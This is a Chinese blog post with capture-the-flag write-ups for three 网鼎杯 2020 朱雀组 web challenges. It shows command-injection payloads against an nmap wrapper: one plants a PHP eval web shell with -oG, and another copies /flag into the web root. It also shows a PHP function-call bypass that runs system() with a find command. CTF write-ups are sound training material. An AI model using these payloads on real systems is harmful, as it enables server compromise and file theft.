网鼎杯2020朱雀组
[网鼎杯 2020 朱雀组]Think Java
java代审
[网鼎杯 2020 朱雀组]Nmap
1 | nmap -oG 写入文件 |
黑盒但是随便测测应该就可以绕过了
1 | 127.0.0.1'<?=eval($_POST[a]);?> -oG shell.php' |
1 | http://7ae0ff86-ac34-4c5d-bde7-b6a40ce2818e.node5.buuoj.cn:81/shell.phtml |
当然还可以读取文件
1 | 127.0.0.1' -iL /flag -oN /var/www/html/flag.txt ' |
访问flag.txt
即可(路径没关系都可以)
[网鼎杯 2020 朱雀组]phpweb
抓包发现参数
1 | POST /index.php HTTP/1.1 |
得到源码
1 |
|
很容易就绕过了,随便测试一下
1 | func=\system&p=find / -type f -name "f*" |
成功
- Title: 网鼎杯2020朱雀组
- Author: baozongwi
- Created at : 2024-08-23 09:23:00
- Updated at : 2024-09-14 15:51:31
- Link: https://baozongwi.xyz/2024/08/23/网鼎杯2020朱雀组/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments